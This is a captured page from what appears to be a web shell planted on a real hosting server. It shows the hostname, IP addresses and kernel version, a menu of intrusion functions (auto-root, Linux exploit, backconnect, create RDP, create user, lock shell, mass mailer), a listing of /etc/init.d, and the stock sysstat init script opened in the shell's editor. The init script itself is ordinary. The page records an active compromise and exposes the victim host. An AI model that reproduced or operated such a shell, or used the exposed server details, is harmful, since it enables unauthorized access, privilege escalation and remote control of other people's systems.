Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.71.254.100
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
acpid
2.22
KB
-rwxr-xr-x
apparmor
3.65
KB
-rwxr-xr-x
atd
1.05
KB
-rwxr-xr-x
console-setup.sh
1.2
KB
-rwxr-xr-x
cron
2.99
KB
-rwxr-xr-x
dbus
3.08
KB
-rwxr-xr-x
grub-common
985
B
-rwxr-xr-x
hwclock.sh
1.71
KB
-rwxr-xr-x
irqbalance
2.58
KB
-rwxr-xr-x
keyboard-setup.sh
1.44
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
named
3.46
KB
-rwxr-xr-x
netfilter-persistent
1.33
KB
-rwxr-xr-x
nfs-common
5.53
KB
-rwxr-xr-x
nscd
3.5
KB
-rwxr-xr-x
plymouth
1.35
KB
-rwxr-xr-x
plymouth-log
760
B
-rwxr-xr-x
procps
959
B
-rwxr-xr-x
quota
951
B
-rwxr-xr-x
quotarpc
1.1
KB
-rwxr-xr-x
rpcbind
2.45
KB
-rwxr-xr-x
rsync
4.31
KB
-rwxr-xr-x
smartmontools
3.02
KB
-rwxr-xr-x
ssh
3.96
KB
-rwxr-xr-x
sysstat
1.54
KB
-rwxr-xr-x
udev
6.71
KB
-rwxr-xr-x
ufw
2.03
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
x11-common
2.7
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sysstat
#! /bin/sh # vim:ft=sh:et ### BEGIN INIT INFO # Provides: sysstat # Required-Start: $remote_fs $local_fs $syslog # Required-Stop: # Default-Start: 2 3 4 5 # Default-Stop: # Short-Description: Start/stop sysstat's sadc # Description: Sysstat contains system performance tools for Linux # The init file runs the sadc command in order to write # the "LINUX RESTART" mark to the daily data file ### END INIT INFO PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/lib/sysstat/debian-sa1 NAME=sadc DESC="the system activity data collector" test -f "$DAEMON" || exit 0 umask 022 # our configuration file DEFAULT=/etc/default/sysstat # default setting... ENABLED="false" # ...overridden in the configuration file test -r "$DEFAULT" && . "$DEFAULT" set -e status=0 . /lib/lsb/init-functions case "$1" in start|restart|reload|force-reload) if [ "$ENABLED" = "true" ] ; then log_daemon_msg "Starting $DESC" "$NAME" start-stop-daemon --start --quiet --exec $DAEMON -- --boot || status=$? log_end_msg $status fi ;; stop) ;; status) if [ "$ENABLED" = "true" ] ; then log_success_msg "sadc cron jobs are enabled" exit 0 else log_failure_msg "sadc cron jobs are disabled" exit 3 fi ;; *) log_failure_msg "Usage: $0 {start|stop|restart|reload|force-reload|status}" exit 1 ;; esac exit $status
Close